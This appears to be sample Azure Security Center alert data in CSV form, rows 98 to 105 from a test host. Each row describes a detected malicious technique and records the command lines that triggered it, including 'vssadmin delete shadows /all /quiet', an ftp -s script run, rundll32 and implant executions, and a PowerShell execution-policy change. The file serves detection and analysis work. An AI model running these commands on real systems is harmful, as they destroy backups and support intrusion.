98,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:14,2019-01-15 05:15:14,28f9a2e6-1925-455e-ad97-7af7f92f521d,2518547714857061520_28f9a2e6-1925-455e-ad97-7af7f92f521d,Detection,Microsoft,Suspicious system process executed,Suspicious system process executed,Suspicious system process executed,The system process c:\windows\fonts\csrss.exe was observed running in an abnormal context. Malware often use this process name to masquerade its malicious activity.,Medium,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\fonts\\csrss.exe"",
""command line"": ""c:\\windows\\fonts\\csrss.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x178c"",
""account logon id"": ""0xfaac27"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0xbc8"",
""System Process"": ""CSRSS.EXE"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\fonts"",
""Name"": ""csrss.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x178c"",
""CommandLine"": ""c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:14.2938479Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:14.2938479Z"",
""EndTimeUtc"": ""2019-01-15T05:15:14.2938479Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
99,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:16,2019-01-15 05:15:16,8e73946b-ebea-4625-aa60-d97b82dcfb07,2518547714835690929_8e73946b-ebea-4625-aa60-d97b82dcfb07,Detection,Microsoft,Detected suspicious execution via rundll32.exe,Detected suspicious execution via rundll32.exe,Detected suspicious execution via rundll32.exe,"Analysis of host data on MSTICALERTSWIN1 detected rundll32.exe being used to execute a process with an uncommon name, consistent with the process naming scheme previously seen used by activity group GOLD when installing their first stage implant on a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\rundll32.exe"",
""Suspicious Command Line"": "".\\rundll32 /c 1234.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x176c"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: GOLD\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-AGP-GOLD.pdf?sv=2018-03-28&sr=b&sig=vAwQabeTf42yaWjRqLZXxfkyAHl%2B97yko7Ag7o9mKl4%3D&spr=https&st=2019-01-14T11:45:20Z&se=2019-04-14T12:00:20Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=9083b91f-eeee-467c-9770-82df2b1f0420\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""rundll32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x176c"",
""CommandLine"": "".\\rundll32 /c 1234.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:16.430907Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:16.430907Z"",
""EndTimeUtc"": ""2019-01-15T05:15:16.430907Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
100,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:16,2019-01-15 05:15:16,f0d023fb-376f-46ab-9976-a5825d826bea,2518547714837217151_f0d023fb-376f-46ab-9976-a5825d826bea,Detection,Microsoft,Detected possible local reconnaissance activity,Detected possible local reconnaissance activity,Detected possible local reconnaissance activity,"Analysis of host data on MSTICALERTSWIN1 detected a combination of systeminfo commands that has previously been associated with one of activity group GOLD's methods of performing reconnaissance activity. While 'systeminfo.exe' is a legitimate Windows tool, executing it twice in succession in the way that has occurred here is rare.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": ""cmd /c \""systeminfo && systeminfo\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1700"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: GOLD\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-AGP-GOLD.pdf?sv=2018-03-28&sr=b&sig=gZIu70ASn2QQWQr7mWVPRdyyOiWSYbXqRQl0ux505Hk%3D&spr=https&st=2019-01-15T05:00:22Z&se=2019-04-15T05:15:22Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=40dcc8bf-0478-4f3b-b275-ed0a94f2c013\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1700"",
""CommandLine"": ""cmd /c \""systeminfo && systeminfo\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:16.2782848Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:16.2782848Z"",
""EndTimeUtc"": ""2019-01-15T05:15:16.2782848Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
101,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:15,2019-01-15 05:15:15,265472ff-3820-4dad-8da7-00e39e1a99fd,2518547714843218505_265472ff-3820-4dad-8da7-00e39e1a99fd,Detection,Microsoft,Detected suspicious use of FTP -s Switch,Detected suspicious use of FTP -s Switch,Detected suspicious use of FTP -s Switch,"Analysis of process creation data from the MSTICALERTSWIN1 detected the use of FTP's ""-s:filename"" switch. This switch is used to specify an FTP script file for the client to run. Malware or malicious processes are known to use this FTP switch (-s:filename) to point to a script file which is configured to connect to a remote FTP server and download additional malicious binaries.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\ftp.exe"",
""Suspicious Command Line"": "".\\ftp -s:c:\\recycler\\xxppyy.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1580"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""ftp.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1580"",
""CommandLine"": "".\\ftp -s:c:\\recycler\\xxppyy.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:15.6781494Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:15.6781494Z"",
""EndTimeUtc"": ""2019-01-15T05:15:15.6781494Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
102,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:17,2019-01-15 05:15:17,6c6836bb-23cd-4b31-b78e-08360c5a4f83,2518547714828638992_6c6836bb-23cd-4b31-b78e-08360c5a4f83,Detection,Microsoft,Suspicious Volume Shadow Copy Activity,Suspicious Volume Shadow Copy Activity,Suspicious Volume Shadow Copy Activity,"Analysis of host data has detected a shadow copy deletion activity on the resource.
Volume Shadow Copy (VSC) is an important artifact that stores data snapshots.
Some malware and specifically Ransomware, targets VSC to sabotage backup strategies.",High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\system32\\vssadmin.exe"",
""command line"": ""vssadmin delete shadows /all /quiet"",
""parent process"": ""cmd.exe"",
""process id"": ""0x1550"",
""account logon id"": ""0xfaac27"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0xbc8"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Shadow Copy Delete\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Shadow-Copy-Delete.pdf?sv=2018-03-28&sr=b&sig=OcPH4bb3Av9YNRujbUEnDNuo1H8gwII8Q2sejnoqv2U%3D&spr=https&st=2019-01-14T15:16:13Z&se=2019-04-14T15:31:13Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=0c8d0493-55c3-4b3f-a0b0-c8d4d2ce0343\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""vssadmin.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1550"",
""CommandLine"": ""vssadmin delete shadows /all /quiet"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:17.1361007Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:17.1361007Z"",
""EndTimeUtc"": ""2019-01-15T05:15:17.1361007Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
103,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:12,2019-01-15 05:15:12,b080127b-d5c1-425e-a7ca-e4bbd873009d,2518547714879970078_b080127b-d5c1-425e-a7ca-e4bbd873009d,Detection,Microsoft,Detected suspicious document credentials,Detected suspicious document credentials,Detected suspicious document credentials,"Analysis of host data on MSTICALERTSWIN1 detected a supicious, common precomputed password hash used by malware being used to execute a file. Activity group HYDROGEN has been known to use this password to execute malware on a victim host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\implant.exe"",
""Suspicious Command Line"": ""implant.exe 81ed03caf6901e444c72ac67d192fb9c"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1250"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: HYDROGEN\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-AGP-HYDROGEN.pdf?sv=2018-03-28&sr=b&sig=l6t8ZuaUnahnOzfG6x08jl0SnF%2Bad6OtU8cbvfK0AV8%3D&spr=https&st=2019-01-14T11:45:28Z&se=2019-04-14T12:00:28Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=9083b91f-eeee-467c-9770-82df2b1f0420\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""implant.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1250"",
""CommandLine"": ""implant.exe 81ed03caf6901e444c72ac67d192fb9c"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:12.0029921Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:12.0029921Z"",
""EndTimeUtc"": ""2019-01-15T05:15:12.0029921Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:14,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
104,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:16,2019-01-15 05:15:16,b56b9e61-fefb-47a3-a34f-7c1b44f8268a,2518547714832788202_b56b9e61-fefb-47a3-a34f-7c1b44f8268a,Detection,Microsoft,Detected suspicious Set-ExecutionPolicy and WinRM changes,Detected suspicious Set-ExecutionPolicy and WinRM changes,Detected suspicious Set-ExecutionPolicy and WinRM changes,"Analysis of host data detected changes being made through the Set-ExecutionPolicy cmdlet to enable RemoteSigned, as well as configuration changes to WinRM (Windows Remote Management). Changes of this nature are indicative of use of the ChinaChopper webshell on the affected host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": "".\\cmd /c \""cd /d \""c:\\inetpub\\wwwroot\""&powershell set-executionpolicy remotesigned&echo [s]&cd&echo [e]\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1404"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1404"",
""CommandLine"": "".\\cmd /c \""cd /d \""c:\\inetpub\\wwwroot\""&powershell set-executionpolicy remotesigned&echo [s]&cd&echo [e]\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:16.7211797Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:16.7211797Z"",
""EndTimeUtc"": ""2019-01-15T05:15:16.7211797Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
105,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:17,2019-01-15 05:15:17,2b2ff728-1a2a-46e8-a49a-6991e074a740,2518547714828736209_2b2ff728-1a2a-46e8-a49a-6991e074a740,Detection,Microsoft,Suspicious double extension file executed,Suspicious double extension file executed,Suspicious double extension file executed,"Analysis of host data indicates an execution of a process with a suspicious double extension.
This extension may trick users into thinking files are safe to be opened and might indicate the presence of malware on the system.",High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""command line"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x155c"",
""account logon id"": ""0xfaac27"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0xbc8"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious Double Extensions\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-Double-Extensions.pdf?sv=2018-03-28&sr=b&sig=Rn%2BFQB1fRVwx2j4BzKu%2B5dG0W00AKxVkRkz4SPc%2BCVE%3D&spr=https&st=2019-01-14T15:13:01Z&se=2019-04-14T15:28:01Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""doubleextension.pdf.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x155c"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:17.126379Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:17.126379Z"",
""EndTimeUtc"": ""2019-01-15T05:15:17.126379Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
